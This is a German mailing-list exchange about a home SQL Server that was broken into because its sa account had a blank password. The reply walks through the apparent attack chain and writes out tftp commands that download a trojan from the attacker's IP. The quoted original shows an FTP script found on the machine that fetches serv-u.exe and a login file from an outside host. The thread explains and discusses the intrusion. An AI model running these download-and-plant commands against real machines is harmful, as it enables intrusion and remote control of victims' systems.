Hallo Stefan, offensichtlich ist Dein Rechner gehackt worden. Ursache: kein sa Passwort auf dem Lokalem Rechner gesetzt.
Folgendes ist passiert: Nachdem Du dich mit dem Internet verbunden und die Firewall aufgemacht hast Bist Du durch das Programm "Sfi**" abgescant worden. Danach mit dem Programm SQLL** wurde nachgesehen ob Dein Datenbankserver ein leeres Passwort hat. Das sieht in diesem Programm so aus: "Checking xxx.xxx.xxx.xxx ::: Password is blank!! <---- WARNING!" Dann hat man sich mit Sqle**** mit Deinem SQL Server verbunden und in dem Prog. Sqle**** "c:\dir" eingegeben und schon wurde Deine Festplatte aufgelistet. Und dann geht so was: C:\WINNT\ServicePackFiles\i386\tftp.exe -i MeineIpAdresse GET MeinTrojaner.exe c:\DeinTrojaner.exe ODER C:\WINNT\System32\tftp.exe -i MeineIpAdresse GET MeinTrojaner.exe c:\DeinTrojaner.exe Nur zur Verst�ndnis C.Bischof // // // Ich war gerade dabei, meinen Daheim-SQL-Server mit einem // Produktonssyser // zu synchronisieren und darum habe ich meine Firewall auf // Prot 1433 kurz // aufgemacht. // Tja, 3 Minuten Sp�ter schl�gt sie alarm, da will jemand mit der // IP-Adresse 172.178.124.208 auf meinen SQL-Server zugreifen. // Hab's sofort unterbunden und finde wenige Augenblicke einen // Versuch des // Programmes "serv-u.exe" auf 172.178.124.208 zur�ck zuzugreifen. // Tja, im Win-NT-Verzeichnis (obwohl ich gar kein WinNT habe // sondern ein // C:\Windows aber egal) gefunden: // --- cut --- // open 172.178.124.208 // user serv exe // binary // get /serv-u.exe c:\winnt\system32\bla\serv-u.exe // get /serv-u.ini c:\winnt\system32\bla\serv-u.ini // get /login.txt C:\winnt\system32\bla\login.txt // quit // --- cut --- // Mich nerven die bl�den Einbrechereien schon so gewaltig, // ich kanns gar // nicht sagen. Der Typ d�rfte aus dem AMI-Land kommen - irgendwelche // Chancen mit einer Anzeige? // // Stefan. // // ~~~~~~~~~~~~~~~~~~~~~~~~~~~sponsored by United // Planet~~~~~~~~~~~~~~~~~ // Kaffeepause im United Planet Communityserver ... // http://www.intrexx.com/communityserver // _______________________________________________ // Coffeehouse mailing list // [EMAIL PROTECTED] // http://www.glengamoi.com/mailman/listinfo/coffeehouse // // ~~~~~~~~~~~~~~~~~~~~~~~~~~~sponsored by United Planet~~~~~~~~~~~~~~~~~ Kaffeepause im United Planet Communityserver ... http://www.intrexx.com/communityserver _______________________________________________ Coffeehouse mailing list [EMAIL PROTECTED] http://www.glengamoi.com/mailman/listinfo/coffeehouse
